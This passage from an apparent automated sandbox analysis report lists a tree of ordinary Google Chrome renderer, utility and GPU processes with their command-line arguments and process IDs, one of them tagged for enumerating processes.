  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1820 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:8
  2⤵
  PID:2620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2108 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:8
  2⤵
  PID:5112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2876 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:4560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2888 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:5096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4416 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:5084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4660 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:8
  2⤵
  PID:3000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4764 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:8
  2⤵
  PID:1812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4620 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:8
  2⤵
  PID:1996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:8
  2⤵
  PID:4236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5112 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:8
  2⤵
  PID:4712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:8
  2⤵
  PID:1052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4836 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:8
  2⤵
  PID:1824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5116 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:68
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3080 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:5036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3976 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:8
  2⤵
  PID:4996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5300 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:4524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5220 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:3128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5396 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:4020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5536 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:4604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5532 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:3496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5704 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:1428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6032 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:4884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=6204 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:3904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=6420 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:2928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6328 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:2244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6772 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=6596 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:5160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=7088 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:5264
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6972 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:8
  2⤵
  PID:5580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=6952 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:5648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7804 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:8
  2⤵
  PID:5808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7820 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:8
  2⤵
  PID:5816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=7976 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:5896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=8000 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:5980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=7892 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:5992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=7896 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:6000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=7884 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:6012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=8448 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:6024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=8596 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:6036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=8776 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:6048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=8772 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:6056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=8120 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:6064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=8796 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:6072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=8924 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:6080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=9620 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:5856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=9652 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:5928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=9880 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:5936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=10004 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:5944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=10152 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:5836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=10304 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:5964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=10316 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:5976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=10348 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:6044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=10364 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:5988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=10380 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:5280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=11008 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:6160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=11188 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:6168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=11272 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:6176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=11364 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:6184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=11476 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:6192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=12840 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:7840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=12692 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:7916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=12896 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:7932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=13028 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:7948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=13160 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:7964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=13384 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:8112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=12144 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:8276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --mojo-platform-channel-handle=12192 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:8556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --mojo-platform-channel-handle=9632 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:8616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --mojo-platform-channel-handle=7352 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:8848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --mojo-platform-channel-handle=12096 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:8920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=11416 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:8
  2⤵
  PID:8536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9848 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:8
  2⤵
  PID:8664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9824 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:8
  2⤵
  PID:8780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9852 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:8
  2⤵
  PID:9024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1828 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5320
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --mojo-platform-channel-handle=2232 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:1
  2⤵
  PID:6584
- C:\Program Files\Google\Chrome\Application\chrome.exe
